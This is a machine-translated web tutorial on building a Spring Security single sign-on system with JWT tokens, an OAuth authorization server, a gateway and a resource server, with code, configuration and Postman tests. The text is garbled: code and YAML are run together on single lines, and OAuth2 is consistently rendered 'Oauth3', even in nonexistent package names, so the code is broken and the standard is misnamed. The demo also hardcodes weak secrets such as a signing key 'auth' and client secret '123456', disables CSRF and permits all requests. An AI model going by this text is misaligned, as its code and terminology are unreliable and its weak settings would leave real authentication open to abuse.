Shulou(Shulou.com)06/03 Report--

This article introduces the relevant knowledge of "using Java spring to achieve single sign-on system". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Catalogue

1. Introduction of single sign-on system

two。 Simple service implementation

2.1 add dependencies

2.2 Project profile

2.3 add a project startup class

2.4 start and access the project

3. Optimize further design

Define the security configuration class SecurityConfig

3.2 define user information processing objects

3.3 Login routing configuration in the gateway

3.4 access testing based on Postman

3.5 define the landing page

3.6 build token configuration object

3.7 define authentication authorization core configuration

Core configuration of authorization server

Postman access test

4 Resource server configuration-sca-resource

4.1 build token configuration object

4.3 set permissions for resource access

4.4 start the service access test

4.4.1 access to auth Authentication and Authorization Service to obtain token

4.4.2 access the resource server with TOKEN

4.4.3 display on the front page of 403 exception

4.5 Oauth3 specification

4.6 interview question points

5 Bug analysis

1. Introduction of single sign-on system

Multipoint login system. It is relatively cumbersome to apply (re-login authentication and authorization are required for each access to the resource service). At the same time, the repetition of system code is also relatively high. So single sign-on system is very popular!

Single sign-on system, that is, multiple sites share an authentication and authorization server, after logging in at any one of these sites, users can access all other sites without login. Moreover, each site can interact directly through the login status.

two。 Simple service implementation

Add authentication and authorization service to the project uploaded to the file, login page (login.html), then enter your login account on the page, login password, submit the request to the gateway, and then the gateway forwards the request to the auth project. The successful and failed login needs to return json data, which is implemented as follows

Create sca-auth sub-module in the 02-sca project as an authentication and authorization service

2.1 add dependency org.springframework.boot spring-boot-starter-web com.alibaba.cloud spring-cloud-starter-alibaba-nacos-discovery com.alibaba.cloud spring-cloud-starter-alibaba-nacos-config org.springframework.cloud Spring-cloud-starter-oauth3 org.projectlombok lombok 2.2 Project profile

Create a bootstrap.yml file in the sca-auth project

Server: port: 8071spring: application: name: sca-auth cloud: nacos: discovery: server-addr: localhost:8848 config: server-addr: localhost:88482.3 add project startup class package com.jt;import org.springframework.boot.SpringApplication;import org.springframework.boot.autoconfigure.SpringBootApplication;@SpringBootApplicationpublic class ResourceAuthApplication {public static void main (String [] args) {SpringApplication.run (ResourceAuthApplication.class, args) } 2.4 start and access the project

When the project starts, the system will generate a login password by default

Open the browser to enter http://localhost:8071 to render the landing page

The default user name is user, and the password is the password that is presented on the console when the system boots. Execute the login test, and log in successfully to the following interface (404 appears because there is no login page defined)

3. Optimize further design 3.1 define the security configuration class SecurityConfig

Modify the SecurityConfig configuration class to add processing logic for successful or failed login

Package com.jt.auth.config;import com.fasterxml.jackson.databind.ObjectMapper;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.security.authentication.AuthenticationManager;import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;import org.springframework.security.config.annotation.web.builders.HttpSecurity;import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;import org.springframework.security.web.authentication.AuthenticationFailureHandler Import org.springframework.security.web.authentication.AuthenticationSuccessHandler;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.io.PrintWriter;import java.util.HashMap;import java.util.Map @ Configuration// configuration object-when the system starts up, a proxy object will be generated at the bottom to initialize some objects. The public class SecurityConfig extends WebSecurityConfigurerAdapter {/ / WebSecurityConfigurerAdapter class is an adapter. When configuring, we need to write a configuration class to inherit it, and then write our own configuration / / BCryptPasswordEncoder password encryption object that is more secure than MD5. MD5 brute force reflex can be cracked @ Bean public BCryptPasswordEncoder passwordEncoder () {return new BCryptPasswordEncoder () } / * configure the authentication manager (responsible for authenticating the user information entered by the customer), which is used in other configuration classes * @ return * @ throws Exception * / @ Bean public AuthenticationManager authenticationManagerBean () throws Exception {return super.authenticationManagerBean () } / * * define login rules in this method * 1) release all requests (the current project is only for authentication) * 2) return login success information * 3) return login failure information * * / @ Override protected void configure (HttpSecurity http) throws Exception {/ / disable cross-domain http.csrf () .disable () / / release all requests http.authorizeRequests () .anyRequest () .permitAll (); / / handle http.formLogin () .login Handler (successHandler ()) / .roomHandler (AuthenticationSuccessHandler object) .failureHandler (failureHandler ()) } @ Bean / / build the successHandler () method to create the AuthenticationSuccessHandler object public AuthenticationSuccessHandler successHandler () {/ / return new AuthenticationSuccessHandler () {/ / @ Override// public void onAuthenticationSuccess (HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse, Authentication authentication) throws IOException, ServletException {/} /} return (request,response,authentication)-> {/ / 1. Build a map object to encapsulate the response data Map map=new HashMap (); map.put ("state", 200); map.put ("message", "login ok"); / / response information returned from a successful login / / 2. Write the map object to the client writeJsonToClient (response,map);}; @ Bean / / failureHandler (); method to create the AuthenticationSuccessHandler object public AuthenticationFailureHandler failureHandler () {return (request,response, e)-> {/ / 1. Build a map object to encapsulate the response data Map map=new HashMap (); map.put ("state", 500); map.put ("message", "login failure"); / / response information returned by login failure / / 2. Write the map object to the client writeJsonToClient (response,map);};} / / extract the common code, transfer the object to Json to the client, and build writeJsonToClient (); private void writeJsonToClient (HttpServletResponse response, Object object) throws IOException {/ / Object type, not just Map type, I don't know / / 2. Convert the object to json / / Gson-- > toJson (need to find your own dependencies) / / fastjson-- > JSON (spring-cloud-starter-alibaba-sentinel) / / jackson-- > writeValueAsString (spring-boot-starter-web) String jsonStr=new ObjectMapper (). WriteValueAsString (object); / / 3. Write the json string to the client PrintWriter writer = response.getWriter (); writer.println (jsonStr); writer.flush ();} 3.2 define the user information processing object

Normally, it is used to compare with the user information in the database, whether the authentication is correct and whether it can be authorized.

Package com.jt.auth.service;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.security.core.GrantedAuthority;import org.springframework.security.core.authority.AuthorityUtils;import org.springframework.security.core.userdetails.User;import org.springframework.security.core.userdetails.UserDetails;import org.springframework.security.core.userdetails.UserDetailsService;import org.springframework.security.core.userdetails.UsernameNotFoundException;import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;import org.springframework.stereotype.Service;import java.util.List / * the acquisition and encapsulation of user information when logging in will be implemented in this object. * when the login button is clicked on the page, the loadUserByUsername method of this object will be called. * the user name entered on the page will be passed to the parameters of this method * * / @ Servicepublic class UserDetailsServiceImpl implements UserDetailsService {/ / the interface for obtaining user details @ Autowired / / BCryptPasswordEncoder password encryption object private BCryptPasswordEncoder passwordEncoder / / UserDetails user encapsulates user information (authentication and permission information) @ Override / / overrides loadUserByUsername () in the UserDetailsService interface; the method is defined to check database data and grant the corresponding permission public UserDetails loadUserByUsername (String username) throws UsernameNotFoundException {/ / 1. Query user information based on user name (user name, user status, password,....) / / Userinfo userinfo=userMapper.selectUserByUsername (username); database user information query operation abbreviated String encodedPassword=passwordEncoder.encode ("123456"); / / 2. Query user permission information (visit the database later) / / give some fake data List authorities = AuthorityUtils.createAuthorityList (/ / the permission information here is written like this, followed by "sys:res:create" and "sys:res:retrieve"); / / 3. Encapsulate the user information by return new User (username,encodedPassword,authorities), and configure login routing in the gateway.

Add the following configuration to the gateway profile

Server: port: 9001spring: application: name: sca-resource-gateway cloud: sentinel: # current limiting Design transport: dashboard: localhost:8180 eager: true nacos: discovery: server-addr: localhost:8848 config: server-addr: localhost:8848 file-extension: yml gateway: discovery: locator: enabled: true routes: -id: router02 uri: lb://sca-auth # lb indicates load balancing The underlying layer defaults to use ribbon to implement predicates: # define request rules (requests need to be designed according to this rule)-Path=/auth/login/** # request path design, single architecture filters:-StripPrefix=1 # remove the first layer path in path before forwarding 3.4 for access testing based on Postman

Start the sca-gateway,sca-auth service, and then test the access based on postman

3.5 define the landing page

Define the login-sso.html login page in the static directory of the sca-resource-ui project

Login Please Login Username Password Submit var vm=new Vue ({el: "# app", / / define the monitoring point The underlying vue will build a dom tree in memory based on this monitoring point data: {/ / this object defines the data to be operated on the page username: ", password:"}, methods: {/ / this location defines all business event handling functions doLogin () {/ / 1. Define url let url = "http://localhost:9001/auth/oauth/token" / / 2. Define parameters let params = new URLSearchParams () params.append ('username',this.username); params.append (' password',this.password); params.append ("client_id", "gateway-client"); params.append ("grant_type", "password"); params.append ("client_secret", "123456") / / 3. Send asynchronous request axios.post (url, params). Then ((response) = > {debugger console.log (response.data); let result=response.data; / / localStorage.setItem ("accessToken", result.access_token) Location.href= "/ fileupload.html" rel= "external nofollow"})}); 3.6 build token configuration object

With the help of JWT (Json Web Token- is a json format), the user information is converted into json format, then encrypted, the user information is saved to the client, and then sent to the client, after the JWT is received by the client, it is saved on the client. After that, when accessing other modules with JWT, the resource server parses the user information and accesses it, thus freeing memory.

TokenConfig classes under the config directory

Package com.jt.auth.config;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.security.oauth3.provider.token.TokenStore;import org.springframework.security.oauth3.provider.token.store.JwtAccessTokenConverter;import org.springframework.security.oauth3.provider.token.store.JwtTokenStore / * * create jwt type token * build token consists of three parts: * header (header information: token type) / * payload (data information-user information, permission information) / * SIGNATURE (signature information-partial encryption of header and payload) * * / @ Configuration / / configuration object-the underlying proxy object is generated at system startup to initialize some objects public class TokenConfig {/ / define token issuance passwords (password) Rule), decrypt password / / when the client is performing login, add this information, and the authentication server can issue a token private String SIGNING_KEY = "auth" When signing header and payload, you need a password / / build token generator object () @ Bean public TokenStore tokenStore () {return new JwtTokenStore (jwtAccessTokenConverter ()); / / token generator (jwt converter)} @ Bean / / Jwt converter to convert any data into the jwt string public JwtAccessTokenConverter jwtAccessTokenConverter () {JwtAccessTokenConverter converter=new JwtAccessTokenConverter () / / set the encryption / decryption password converter.setSigningKey (SIGNING_KEY); return converter;}}

Create an authentication manager object

Add the following method to SecurityConfig (which will be used by the license server later):

/ * configure the authentication manager (responsible for authenticating the user information entered by the customer), which will be used in other configuration classes * @ return * @ throws Exception * / @ Bean public AuthenticationManager authenticationManagerBean () throws Exception {return super.authenticationManagerBean ();} 3.7 define the core configuration package com.jt.auth.config of the authentication authorization core configuration authorization server Import lombok.AllArgsConstructor;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.http.HttpMethod;import org.springframework.security.authentication.AuthenticationManager;import org.springframework.security.core.userdetails.UserDetailsService;import org.springframework.security.crypto.password.PasswordEncoder;import org.springframework.security.oauth3.config.annotation.configurers.ClientDetailsServiceConfigurer;import org.springframework.security.oauth3.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;import org.springframework.security.oauth3.config.annotation.web.configuration.EnableAuthorizationServer Import org.springframework.security.oauth3.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;import org.springframework.security.oauth3.config.annotation.web.configurers.AuthorizationServerSecurityConfigurer;import org.springframework.security.oauth3.provider.token.AuthorizationServerTokenServices;import org.springframework.security.oauth3.provider.token.DefaultTokenServices;import org.springframework.security.oauth3.provider.token.TokenEnhancerChain;import org.springframework.security.oauth3.provider.token.TokenStore;import org.springframework.security.oauth3.provider.token.store.JwtAccessTokenConverter;import java.util.Arrays / * complete the assembly of all configurations, complete the configuration operations such as authentication authorization and JWT token issuance in this configuration class * 1) SpringSecurity (security authentication and authorization) * 2) TokenConfig * 3) Oauth3 (not to say for the time being) * / @ AllArgsConstructor@Configuration@EnableAuthorizationServer / / enable the authentication and authorization service public class Oauth3Config extends AuthorizationServerConfigurerAdapter {/ / this object is responsible for completing the authentication management private AuthenticationManager authenticationManager / / TokenStore is responsible for completing token creation, information reading private TokenStore tokenStore; / / is responsible for obtaining user details information (username,password,client_id,grant_type,client_secret) / / private ClientDetailsService clientDetailsService; / / JWT token converter (building tokens based on user information, parsing tokens) private JwtAccessTokenConverter jwtAccessTokenConverter; / / password encryption matcher object private PasswordEncoder passwordEncoder / / responsible for obtaining user information private UserDetailsService userDetailsService / / set the configuration of the authentication endpoint (/ oauth/token). The client obtains the JWT token @ Override public void configure (AuthorizationServerEndpointsConfigurer endpoints) throws Exception {endpoints / / configure the authentication manager through this path. AuthenticationManager (authenticationManager) / / the method of verifying the user obtains the user details. UserDetailsService (userDetailsService) / requires the submission of authentication using the post request method Improve security. AllowedTokenEndpointRequestMethods (HttpMethod.POST,HttpMethod.GET) / to configure token generation, due to the complexity of token generation, there are ways to implement .tokenServices (tokenService ()) / / this is not configured, and the default token is UUID.randomUUID (). ToString ()} / define token generation policy @ Bean public AuthorizationServerTokenServices tokenService () {/ / the goal of this method is to obtain a token generator DefaultTokenServices services=new DefaultTokenServices (); / / support token refresh policy (token has expiration time) services.setSupportRefreshToken (true) / / set token generation policy (tokenStore is configured in TokenConfig, this time we apply JWT- to define a token format) services.setTokenStore (tokenStore); / / set token enhancement (fixed usage-token Payload part allows you to add extended data, such as user rights information) TokenEnhancerChain chain=new TokenEnhancerChain (); chain.setTokenEnhancers (Arrays.asList (jwtAccessTokenConverter)) / / set token enhancement object to token generation services.setTokenEnhancer (chain); / / set token validity period services.setAccessTokenValiditySeconds (3600); / / 1 hour / / refresh token application scenario: generally, after the user logs in to the system, when the token is about to expire, the system automatically helps the user refresh the token to improve the user's sense of experience services.setRefreshTokenValiditySeconds (3600,72). / / 3 days / / configure client details / / services.setClientDetailsService (clientDetailsService); return services } / / setting client details is similar to user details @ Override public void configure (ClientDetailsServiceConfigurer clients) throws Exception {clients.inMemory () / / client id .withClient ("gateway-client") / / client secret (passwordEncoder.encode ("123456")) / / set permissions .scopes ("all") / / all only It's just a name with the same effect as writing abc / / the string in the operation that the client is allowed to perform must not be misspelled. AuthorizedGrantTypes ("password" "refresh_token") } / / configuration of security constraints after successful authentication @ Override public void configure (AuthorizationServerSecurityConfigurer security) throws Exception {/ / after authentication is passed What actions are allowed for clients to do security / / expose oauth/token_key endpoints .tokenKeyAccess ("permitAll ()") / expose oauth/check_token endpoints .checkTokenAccess ("permitAll ()") / / allow requests for authentication (apply for tokens) .allowFormauthenticationForClients () }} Postman access Test

Step 1: start the service

Start the sca-auth service and the sca-resource-gateway,sca-resource-ui service in turn.

Step 2: detect the Endpoints information of the sca-auth service console, for example:

Open postman for login access test

{"access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2MzAwNzYxMTAsInVzZXJfbmFtZSI6ImphY2siLCJhdXRob3JpdGllcyI6WyJzeXM6cmVzOmNyZWF0ZSIsInN5czpyZXM6cmV0cmlldmUiXSwianRpIjoiM2Q0MzExOTYtYmRkZi00Y2NhLWFmMDMtNWMzNGM4ZmJkNzQ3IiwiY2xpZW50X2lkIjoiZ2F0ZXdheS1jbGllbnQiLCJzY29wZSI6WyJhbGwiXX0.GnrlqsZMSdagDaRQDZWDLbY7I7KUlXQgyXATcXXS6FI", "token_type": "bearer", 4 Resource Server configuration-sca-resource

4.1 build token configuration object package com.jt.resource.config;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;import org.springframework.security.oauth3.config.annotation.web.configuration.EnableResourceServer;import org.springframework.security.oauth3.provider.token.TokenStore;import org.springframework.security.oauth3.provider.token.store.JwtAccessTokenConverter;import org.springframework.security.oauth3.provider.token.store.JwtTokenStore / * * create jwt type token * build token consists of three parts: * header (header information: token type) / * payload (data information-user information, permission information) / * SIGNATURE (signature information-partial encryption of header and payload) * * / @ Configuration / / configuration object-the underlying proxy object is generated at system startup to initialize some objects public class TokenConfig {/ / define token issuance passwords (password) Rule), decrypt password / / when the client is performing login, add this information, and the authentication server can issue a token / / when signing header and payload, private String SIGNING_KEY = "auth" / / build token generator object () @ Bean public TokenStore tokenStore () {return new JwtTokenStore (jwtAccessTokenConverter ()); / / token generator (converter)} / / Jwt converter to convert any data into jwt string @ Bean public JwtAccessTokenConverter jwtAccessTokenConverter () {JwtAccessTokenConverter converter=new JwtAccessTokenConverter (); / / set encryption / decryption password converter.setSigningKey (SIGNING_KEY); return converter }}

4.2 Resource service token resolution configuration

two。 Convert the object to json / / Gson-- > toJson (you need to find your own dependencies) / / fastjson-- > JSON (spring-cloud-starter-alibaba-sentinel) / / jackson-- > writeValueAsString (spring-boot-starter-web) package com.jt.resource.config;import com.alibaba.fastjson.JSON;import com.google.gson.Gson;import com.fasterxml.jackson.databind.ObjectMapper;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.context.annotation.Bean Import org.springframework.context.annotation.Configuration;import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;import org.springframework.security.config.annotation.web.builders.HttpSecurity;import org.springframework.security.oauth3.config.annotation.web.configuration.EnableResourceServer;import org.springframework.security.oauth3.config.annotation.web.configuration.ResourceServerConfigurerAdapter;import org.springframework.security.oauth3.config.annotation.web.configurers.ResourceServerSecurityConfigurer;import org.springframework.security.oauth3.provider.token.TokenStore;import org.springframework.security.web.AuthenticationEntryPoint Import org.springframework.security.web.access.AccessDeniedHandler;import javax.servlet.http.HttpServletResponse;import java.io.PrintWriter;import java.util.HashMap;import java.util.Map / * configuration of the resource server, in this object * 1) JWT token resolution configuration (when the client accesses the resource with a token To resolve tokens) * 2) start the authorization configuration for resource access (not all login users can access all resources) * / @ Configuration@EnableResourceServer this note starts the default configuration of the resource server @ EnableGlobalMethodSecurity (prePostEnabled = true) / / starts the permission check public class ResourceServerConfig extends ResourceServerConfigurerAdapter {@ Autowired private TokenStore tokenStore before executing the method / * token service configuration * / @ Override public void configure (ResourceServerSecurityConfigurer resources) throws Exception {/ / super.configure (resources); / / define token generation policy. This is not to create tokens, but to resolve token resources.tokenStore (tokenStore). } / * routing security authentication configuration * / @ Override public void configure (HttpSecurity http) throws Exception {/ / super.configure (http); http.csrf (). Disable (); / / turn off cross-domain attacks / / release all resource access (do not authenticate the party of the resource) http.authorizeRequests (). AnyRequest (). PermitAll () / / http.authorizeRequests () .mvcMatchers ("/ resource/**") / / authenticated (); / / if there is no authentication, the access will report 401exception / / handle exception http.exceptionHandling () .accessDeniedHandler (accessDeniedHandler ()); / / 403exception handling. Processing for denying access (AccessDeniedHandler type object)} @ Bean public AccessDeniedHandler accessDeniedHandler () {/ / return AccessDeniedHandler object return (request,response, exception)-> {Map map = new HashMap (); map.put ("state", HttpServletResponse.SC_FORBIDDEN); / / 403 map.put ("message", "Sorry, no such resource") / 1 sets the encoding response.setCharacterEncoding ("utf-8") of the response data; / / 2 tells the browser the content type of the response data and encodes response.setContentType ("application/json;charset=utf-8"); / / 2. Convert the object to json / / 1.fastjsonmuri-> JSON (spring-cloud-starter-alibaba-sentinel) / / String jsonStr= JSON.toJSONString (map); / / fastjson / / 2.Gsonmuri-> toJson (need to find your own dependencies) Gson gson = new Gson (); String jsonStr= gson.toJson (map) / / jackson-- > writeValueAsString (spring-boot-starter-web) / / String jsonStr = new ObjectMapper (). WriteValueAsString (map); PrintWriter writer = response.getWriter (); writer.println (jsonStr); writer.flush ();};}} 4.3 set permissions for resource access

Add @ PreAuthorize ("hasAuthority ('sys:res:create')") annotation to the upload method of ResourceController to tell the underlying framework method the permissions required for this method

@ PreAuthorize ("hasAuthority ('sys:res:create')") @ PostMapping ("/ upload/") public String uploadFile (MultipartFile uploadFile) throws IOException {...}

Without permission, a 403 exception will be reported, and the information of our modification of the 403 exception will be returned to the console.

4.4 start Service access Test 4.4.1 access to auth Authentication Authorization Service to obtain token

Start the service (sca-auth,sca-resource-gateway,sca-resource)

Execute POSTMAN and visit auth Authentication and Authorization Service http://localhost:9001/auth/oauth/token, to get token

4.4.2 access the resource server with TOKEN

Copy access_token, request address: http://localhost:9001/sca/resource/upload/

1. Set the request header (header) to carry the token and specify the content type of the request

two。 Set the request body (body), set the form-data,key requirement to file type, the parameter name is the same as the parameter name of your server controller file upload method, and the value is the file you selected.

4.4.3 display function upload (file) {/ / define a form let form=new FormData () for the 403 exception front page; / / add pictures to the form form.append ("uploadFile", file); let url= "http://localhost:9000/sca/resource/upload/"; / / Asynchronous submission method 1 axios.post (url,form, {"Authorization": "Bearer" + localStorage.getItem ("accessToken")}) .then (function (response) {let result=response.data; if (result.state==403) {alert (result.message); return } alert ("upload ok");})}

1. Start the service (sca-auth,sca-resource-gateway,sca-resource)

two。 Execute login localhost:8080/login-sso.html to get access_token token

3. Access resources with tokens (the prefix "sca" in url is specified in the resource server. You can write how your gateway is configured.)

Success:

403 exception, no access permission

4.5 Oauth3 specification

Oauth3 defines an authentication authorization protocol, a specification in which four types of roles are defined:

1) Resource owner (User)

2) Authentication Authorization Server (jt-auth)

3) Resource server (jt-resource)

4) client application (jt-ui)

At the same time, several modes of authentication authorization are specified in this protocol:

1) password mode (authentication based on username and password)

2) Authorization code mode (what we call tripartite authentication: QQ, Wechat, Weibo,.)

3)...

4.6 interview question points

Design architecture of single sign-on system (micro-service architecture)

Design and partition of services (resource server, authentication server, gateway server, client service)

The process of authentication and resource access (authentication before access to resources)

Some key technologies in authentication and authorization (Spring Security,Jwt,Oauth3)

FAQ analysis

Why single sign-on (distributed systems, when accessing different service resources, do not always have to log in to improve the user experience)

Single sign-on solution? (two commonly used in the market: spring security+jwt+oauth3,spring securit+redis+oauth3)

What is Spring Security? (a security default in the spring framework that implements authentication and authorization operations)

What is JWT? (a token format, a token specification that designs tokens by encoding and encrypting JSON data.)

What is OAuth3? (an authentication and authorization specification that defines the division of services in single sign-on and the related types of authentication)

...

5 Bug analysis

401: there is no authentication when accessing resources.

403: there is no permission to access the resource.

404: the accessed resource cannot be found (be sure to check the url of your accessed resource)

405: the request method does not match (the client request method is GET, and the server handles the request is Post)

500: you can't solve it without looking at the background? (error,warn)

...

"using Java spring to achieve single sign-on system" content is introduced here, thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.